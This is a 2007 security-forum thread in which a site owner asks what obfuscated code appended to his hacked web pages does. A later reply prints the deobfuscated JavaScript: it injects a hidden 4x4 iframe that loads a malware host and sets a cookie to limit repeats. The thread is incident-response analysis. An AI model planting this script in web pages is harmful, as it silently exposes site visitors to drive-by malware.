• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

What Does This Hack Do?

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Computer Forensics and Incident Response

View previous topic :: View next topic  
Author Message
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Tue Jul 24, 2007 8:15 pm    Post subject: What Does This Hack Do? Reply with quote

Three of my websites were compromised last week, and the following code (or variations of it) was added as the last line of every HTM and PHP file in the root directory.



Can anyone tell me what this does or how to decipher it? (I can provide a text file with this for anyone interested.

Thanks,
MrConsumer
Back to top
View user's profile Send private message
Advocate
Just Arrived
Just Arrived


Joined: 31 Aug 2006
Posts: 0
Location: Amsterdam, NL

Offline

PostPosted: Mon Jul 30, 2007 11:20 am    Post subject: Reply with quote

It looks like obfuscated javascript to be honest...

I haven't got time to confirm what it does at the moment but maybe someone else can have a shot. Additionally you could attempt to run it in an isolated virtual environment and have a look!

Smile
Back to top
View user's profile Send private message
icujc
Just Arrived
Just Arrived


Joined: 21 Apr 2005
Posts: 2


Offline

PostPosted: Tue Jul 31, 2007 4:37 am    Post subject: Reply with quote

Trying to type this from your image file is insane... A text document would be a lot easier to copy and paste, but maybe this will help: http://scriptasylum.com/tutorials/encdec/encode-decode.html
Back to top
View user's profile Send private message
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Tue Jul 31, 2007 1:29 pm    Post subject: Reply with quote

I will be happy to provide a text file of the offending code via email. I didn't want to create a situation where this thing could harm someone viewing it, so I turned it into a .gif.

Also, Sophos has analyzed the file, and is adding it to their virus list (but I still don't know what it purportedly would do):

http://www.sophos.com/security/analyses/trojpintadda.html

Edgar
Back to top
View user's profile Send private message
lrebrown
Just Arrived
Just Arrived


Joined: 08 Dec 2005
Posts: 0
Location: UK

Offline

PostPosted: Tue Jul 31, 2007 4:58 pm    Post subject: Reply with quote

you don't need to worry about harming anyone viewing it. when posting your message the html (e.g. <script> tag) will either be stripped from your post, or characters like < and > will be encoded to make them harmless (they will display as text on the page rather than being parsed as html tags).

it's perfectly safe to post it here, so long as the forum is protected against XSS attacks (which it most certainly will be).
Back to top
View user's profile Send private message Visit poster's website
mrconsumer
Just Arrived
Just Arrived


Joined: 24 Jul 2007
Posts: 0


Offline

PostPosted: Wed Aug 01, 2007 1:38 pm    Post subject: Reply with quote

I uploaded a zipped copy of the actual text here:
http://www.mrconsumer.com/hack.zip

Thanks,

Edgar
Back to top
View user's profile Send private message
The_Real_Gandalf
Trusted SF Member
Trusted SF Member


Joined: 14 Apr 2004
Posts: 0
Location: Athens,Greece

Offline

PostPosted: Tue Sep 25, 2007 10:25 am    Post subject: Reply with quote

it shows like an incomplete source code for a virus id string. I do not think that it is fully functional , but the best way to test it , is to "install/run" it on an isolated machine with all services running (e.g. WWW, IIS, etc.)

Gandalf
Back to top
View user's profile Send private message Visit poster's website AIM Address
jumperinthedoor
Just Arrived
Just Arrived


Joined: 30 Oct 2007
Posts: 0


Offline

PostPosted: Wed Oct 31, 2007 11:52 pm    Post subject: Reply with quote

It is an obfuscated javascript. It does function and sets an iFrame to 24.update1.classictel.org/html/. This is a site belonging to the Russian Business Network. I tried to wget the 24.update1.classictel.org/html/ to see what malware it was hosting but I can't get there because we block it here. Anyway, here is the unobfuscated script:

function fp(yR,qd){
var jM=new Date();
var Jr= new Date();
Jr.setTime(jM.getTime()+86400000);
document.cookie = yR+"="+escape(qd)+";
expires="+Jr.toGMTString();
}

var qh='s1fTc',pG='1';
var oX='update1.classictel.org',Lt='/html/';

if(document.cookie.indexOf(qh+'='+pG)==-1){
var FD='http://'+(document.location.host != ''?'':RC())+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.')+'.'+RC()+'.'+oX+Lt;
var ft=document.createElement('iframe');
ft.setAttribute('src',FD);ft.frameBorder=0; ft.width=4;
ft.height=4;
try {
document.body.appendChild(ft);
fp(qh,pG);
}
catch(e){
document.write('<html><body></body></html>');
document.body.appendChild(ft); fp(qh,pG);
}
}

function RC(){
var KO=24,FR="01234567890abcdef";
var na="";
for(BC=0; BC < KO; BC++) na+= FR.substr(Math.floor(Math.random()*FR.length),1,1);
return na;
}

Update: The site 24.update1.classictel.org/html/ redirects to another site that was taken down by the hosting provider.
Back to top
View user's profile Send private message Yahoo Messenger
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Computer Forensics and Incident Response All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register